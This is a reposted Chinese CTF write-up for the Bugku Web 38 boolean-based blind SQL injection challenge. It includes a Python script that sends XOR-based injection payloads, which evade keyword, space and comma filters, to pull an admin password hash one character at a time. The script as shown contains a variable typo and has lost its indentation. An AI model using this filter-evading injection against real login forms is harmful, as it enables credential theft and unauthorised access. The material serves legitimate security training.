概述
Bugku Web 38
提 示: 基于布尔的SQL盲注
曾经我以为SQL注入很简单,没有多加练习,直到发现自己连ciscn初赛的easy_sql注入都不会做,我才追悔莫及
你看那个连SQL注入都不会的人好像条????啊
先瞅瞅
进入环境,是一个登陆页面,先试试万能密码(×),先试试admin
与bugku
,admin
与bugkuctf
,然后得到了flag,此题完
好好做
显示不合法的输入,显然被过滤了
然后再试试别的,发现被过滤的还有and,空格,逗号,等号,for
然后写脚本爆破password
import requests
import time
import string
url = 'http://114.67.246.176:19762/index.php'
source = string.digits + string.ascii_lowercase
a = ''
for i in range(1, 50):
for j in sourse:
payload = "admin'^((ascii(mid((select(password)from(admin))from(%s))))<>%s)^1#" % (i, ord(j))
data = {'username': payload, 'password': '0'}
res = requests.post(url, data=data)
time.sleep(0.01)# 不加sleep网站会因访问过快拒绝访问
if 'username does not exist!' in res.text:
a += j
print(a)
break
然后得到结果,用MD5解密可以看到密码是bugkuctf,好家伙
之后假装刚知道的账号密码,去登陆就得到了flag
最后
以上就是任性项链为你收集整理的Bugku Web 38的全部内容,希望文章能够帮你解决Bugku Web 38所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复